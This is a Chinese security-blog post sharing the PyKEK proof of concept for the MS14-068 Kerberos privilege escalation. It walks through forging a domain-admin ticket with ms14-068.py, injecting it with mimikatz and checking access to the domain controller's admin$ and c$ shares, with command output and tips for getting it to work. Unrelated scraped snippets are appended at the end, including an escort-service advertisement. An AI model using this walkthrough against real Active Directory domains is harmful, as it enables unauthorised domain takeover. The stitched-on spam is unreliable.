数日前 安全脉搏播报了《MS14-068 Kerberos Domain Privilege Escalation》,安全运维和渗透师必关注的一个漏洞,该漏洞可能允许攻击者提升普通域用户账户为域管理员账户。
老外在github给出了一个POC,先分享如下:
PyKEK (Python Kerberos Exploitation Kit), a python library to manipulate KRB5-related data. (Still in development)
For now, only a few functionalities have been implemented (in a quite Quick'n'Dirty way) to exploit MS14-068 (CVE-2014-6324) .
More is coming...
Sylvain Monné
Contact : sylvain dot monne at solucom dot fr
http://twitter.com/bidord
Special thanks to: Benjamin DELPY
kek.krb5: Kerberos V5 (RFC 4120) ASN.1 structures and basic protocol functions
kek.ccache: Credential Cache Binary Format (cchache)
kek.pac: Microsoft Privilege Attribute Certificate Data Structure (MS-PAC)
kek.crypto: Kerberos and MS specific cryptographic functions
Exploits MS14-680 vulnerability on an un-patched domain controler of an Active Directory domain to get a Kerberos ticket for an existing domain user account with the privileges of the following domain groups :
Domain Users (513)
Domain Admins (512)
Schema Admins (518)
Enterprise Admins (519)
Group Policy Creator Owners (520)
USAGE:
ms14-068.py -u @ -s -d
OPTIONS:
-p
--rc4
Linux (tested with samba and MIT Kerberos)
On Windows
SID获取 *** :
1)wmic useraccount where name="USERNAME" get sid
2)whoami /all 本机可以直接查出自己的SID;
胖编想 在未及时patch的内网内是不是要如鱼得水 随意穿插呢?那么内网渗透门槛又被拉低了?
为不能访问github的小朋友们提供百度盘链接,胖编这么贴心,应该能骗得主编表侄女的欢心了吧,想想就开心,想想就自信。
Update:
1) use ms14-068.py
ms14-068.py -u -s S-1-5-21-3653881884-3918934852-1693569208-8965 -d DC2.secpulse.local
Password:
[+] Building AS-REQ for DC2.secpulse.local... Done!
[+] Sending AS-REQ to DC2.secpulse.local... Done!
[+] Receiving AS-REP from DC2.secpulse.local... Done!
[+] Parsing AS-REP from DC2.secpulse.local... Done!
[+] Building TGS-REQ for DC2.secpulse.local... Done!
[+] Sending TGS-REQ to DC2.secpulse.local... Done!
[+] Receiving TGS-REP from DC2.secpulse.local... Done!
[+] Parsing TGS-REP from DC2.secpulse.local... Done!
[+] Creating ccache file ''... Done!
2)put your file into mimikatz directory
最新版本的mimikatz才支持kerberos::ptc模块,下载地址:
https://github.com/gentilkiwi/mimikatz/releases/tag/2.0.0-alpha-20141120
否则会出现
ERROR mimikatz_doLocal ; "ptc" command of "kerberos" module not found !
3)新版本执行
mimikatz.exe log "kerberos::ptc " exit
Using 'mimikatz.log' for logfile : OK
mimikatz(commandline) # kerberos::ptc
Principal : (01) : secpulse ; @ SECPULSE.LOCAL
Data 0
Start/End/MaxRenew: 2014/12/7 9:43:01 ; 2014/12/7 19:43:01 ; 2014/12/14 9:43:01
Service Name (01) : krbtgt ; SECPULSE.LOCAL ; @ SECPULSE.LOCAL
Target Name (01) : krbtgt ; SECPULSE.LOCAL ; @ SECPULSE.LOCAL
Client Name (01) : secpulse ; @ SECPULSE.LOCAL
Flags 50a10000 : name_canonicalize ; pre_authent ; renewable ; proxiable ; forwardable ;
Session Key : 0x00000017 - rc4_hmac_nt
1af2c0401238d0346b5456788atf1140
Ticket : 0x00000000 - null ; kvno=2 [...]
* Injecting ticket : OK
mimikatz(commandline) # exit
Bye!
4)如果injecte成功 你有可能获得到了域管理session
那么klist看一下是否有了kerberos Ticket
那么 测试一下
net use \\DC2.secpulse.local\admin$ //注:使用IP可能会失败
dir \\DC2.secpulse.local\c$ 看看有木有权限 好运~
备注:
测试环境:
win7,在xp下mimikatz会出错
python2.7,使用更高版本比如python3.3脚本会报错
在本机以local admin登录,如果以域用户登录提权会失败
如果在以上操作下仍然失败,建议重启主机,并用域管理员在域内新建普通用户,以新建用户的用户名密码执行python脚本,重复以上流程
老外这篇是以local admin(not with AD domain credentials)登陆的,成功获得域控机器权限。
打了patch的暂时就没办法利用啦。
无论是日常生活還是工作中基础全是离不了电脑上,坚信许多 盆友都是会遭受电脑蓝屏常见故障,不得不承认,电脑上的电脑蓝屏、黑屏故障的确是较为普遍的,那麼今日我就来为大伙儿介绍一下电脑蓝屏常见故障在其中的一...
北京商务陪伴伴游微信号【戚孝洁】 今天给大家分享的内容是“北京商务陪伴伴游微信号【戚孝洁】”,我是戚孝洁,来自南阳市,今年28岁,作为职业:深圳大学学生,我热爱我的职业:深圳大学学生。三圍:胸60腰8...
AMD在年初的CES 2020展会上发布了全新的锐龙4000系列移动处理器,凭借着7nm工艺和Zen2微架构,带来非常出色的性能表现,为笔记本市场带来了新的变革与活力。 作为知名OEM厂商,惠普经过...
本文导读目录: 1、约翰尼·李·米勒的人物评价 2、这个女演员是谁?? 3、电影福尔摩斯先生男主角还出演过那些电影? 4、有谁知道 黑客(电脑黑客hackers) 这部电影啊,知道哪...
蚂蚁庄园小课堂5月12日的问题和发生灾害自救有关,当地震时,我们应该如何自救呢?小鸡宝宝考考你地震发生时,躲在什么空间里自救存活率较高?答对可以领取80g小鸡饲料。快来一起看看今天的蚂蚁庄园答题答案吧...
本文导读目录: 1、飞机出故障无法降落 天才少年开法拉利和飞机连接数据拯救生命是什么电影? 2、以黑客为题材的美剧?? 3、求一部电影,一位黑客控制了客机,可以用一个操纵杆控制飞机的航线和高低...